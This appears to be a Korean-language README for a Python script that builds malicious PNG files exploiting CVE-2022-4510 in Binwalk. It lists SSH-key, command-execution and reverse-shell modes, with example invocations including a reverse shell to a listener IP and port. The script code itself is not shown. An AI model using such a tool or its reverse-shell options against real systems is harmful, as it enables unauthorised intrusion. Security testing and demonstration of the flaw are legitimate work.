
CVE-2022-4510 RCE Binwalk를 대상으로 하는 익스플로잇 생성용 Python 스크립트입니다. SSH, 명령 실행, 리버스 셸 옵션을 지원합니다. 익스플로잇은 PNG 형식으로 저장됩니다. 테스트 및 데모에 적합합니다.
이 스크립트는 CVE-2022-4510 Binwalk 취약점을 대상으로 하는 익스플로잇을 생성할 수 있게 해줍니다. 익스플로잇은 테스트 및 시연 목적으로 사용할 수 있습니다. 지원되는 옵션에는 SSH, 명령 실행, 리버스 셸이 포함됩니다.
ssh: SSH용 익스플로잇을 생성합니다.
file: 입력 .png 파일의 경로.pub: 공개 키 파일의 경로.command: 명령 실행용 익스플로잇을 생성합니다.
--command: 실행할 명령.file: 입력 .png 파일의 경로.reverse: 리버스 셸용 익스플로잇을 생성합니다.
file: 입력 .png 파일의 경로.ip: 리스너의 IP 주소.port: 리스너의 포트 번호.사용 예시:
python exploit_generator.py ssh input.png public_key.pub
python exploit_generator.py command --command "ls -l" input.png
python exploit_generator.py reverse input.png 192.168.0.100 4444
생성된 익스플로잇은 현재 디렉터리에 binwalk_exploit.png로 저장됩니다.
이 스크립트는 책임감 있게, 취약점을 테스트하거나 시연할 권한이 있는 시스템에서만 사용하십시오. 저자는 이 스크립트의 불법 또는 무단 사용에 대해 책임을 지지 않습니다.